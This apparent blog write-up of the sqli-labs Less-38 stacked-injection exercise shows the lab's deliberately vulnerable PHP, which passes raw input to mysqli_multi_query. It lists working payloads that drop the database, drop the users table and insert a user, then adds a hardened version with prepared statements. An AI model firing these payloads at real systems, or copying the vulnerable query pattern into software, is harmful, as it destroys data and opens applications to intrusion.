SQL injection less38 (Stack Injection)
2022-07-28 22:17:00 【Happy star】
<?php
// $host, $dbuser, $dbpass and $dbname are defined elsewhere in the lab (not shown on this page).
if(isset($_GET['id']))
{
    // User input is taken as-is: this is the deliberately vulnerable part of the lab.
    $id=$_GET['id'];
    // connectivity
    // mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);
    // Check connection (mysqli_connect_errno() takes no arguments)
    if (mysqli_connect_errno())
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
    }
    // $id is concatenated straight into the SQL text.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    /* execute multi query: every semicolon-separated statement in $sql is run */
    if (mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if ($result = mysqli_store_result($con1))
        {
            if($row = mysqli_fetch_row($result))
            {
                echo '<font size = "5" color= "#00FF00">';
                printf("Your Username is : %s", $row[1]);
                echo "<br>";
                printf("Your Password is : %s", $row[2]);
                echo "<br>";
                echo "</font>";
            }
            // mysqli_free_result($result);
        }
        /* print divider */
        if (mysqli_more_results($con1))
        {
            //printf("-----------------\n");
        }
        // The loop over further result sets is commented out, so they are never shown.
        //while (mysqli_next_result($con1));
    }
    else
    {
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
    /* close connection */
    mysqli_close($con1);
}
else {
    echo "Please input the ID as parameter with numeric value";
}
?>
mysqli_multi_query() executes one or more queries against the database. Multiple queries are separated by semicolons.
mysqli_store_result() transfers the result set returned by the last query.
mysqli_fetch_row() takes one row from the result set and returns it as an enumerated array.
The code calls mysqli_store_result() only once and the mysqli_next_result() loop is commented out, so only the result of the first query is displayed. The results of the following queries are not displayed.
Looking at this challenge again: as in Less1, union injection works here and can be used to query data.
Here I try a few stacked-injection payloads:
?id=1';1=1
?id=1';1=2
?id=1';nihao
?id=1';nihao'
All of them give the same result.
So the page only shows the result of the first query. The following queries have no effect on the output.
So stacked injection cannot be used to read data here. However, inserting data, deleting data, updating data, and modifying the names of tables and databases all work:
?id=1';drop database security;
?id=1';drop table users;
?id=1';insert into users(username,password) values('happy','coder');
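For comparison, a hardened form of the same lookup, as an added example that is not part of the original post or of sqli-labs. It assumes the same `$host`, `$dbuser`, `$dbpass` and `$dbname` variables and the `users(id, username, password)` columns seen above; `find_user()` is a hypothetical helper name.

```php
<?php
// Added example: hardened form of the Less-38 lookup (not sqli-labs code).
// Assumption: $host, $dbuser, $dbpass and $dbname are set as in the lab's own config.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of failing silently

// find_user() is a hypothetical helper name introduced for this example.
function find_user(mysqli $con, string $rawId): ?array
{
    // 1. Validate: the page asks for a numeric ID, so accept only a positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // "1';drop table users;" and similar input ends here
    }
    // 2. Bind: the value travels separately from the SQL text, so a quote or
    //    semicolon in it can never terminate the statement. prepare() also
    //    accepts a single statement only, unlike mysqli_multi_query().
    $stmt = $con->prepare('SELECT username, password FROM users WHERE id = ? LIMIT 0,1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($username, $password);
    $row = $stmt->fetch() ? ['username' => $username, 'password' => $password] : null;
    $stmt->close();
    return $row;
}

if (!isset($_GET['id']) || !is_string($_GET['id'])) {
    echo 'Please input the ID as parameter with numeric value';
    exit;
}

try {
    $con = new mysqli($host, $dbuser, $dbpass, $dbname);
    $row = find_user($con, $_GET['id']);
    $con->close();
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage()); // keep database errors out of the response
    $row = null;
}

if ($row === null) {
    echo 'No such user';
} else {
    // Encode on output so stored values cannot inject markup.
    printf('Your Username is : %s<br>', htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'));
    printf('Your Password is : %s<br>', htmlspecialchars($row['password'], ENT_QUOTES, 'UTF-8'));
}
```

Running the application under a database account that has no DROP or ALTER privileges limits what a stacked statement could do if one were ever reached.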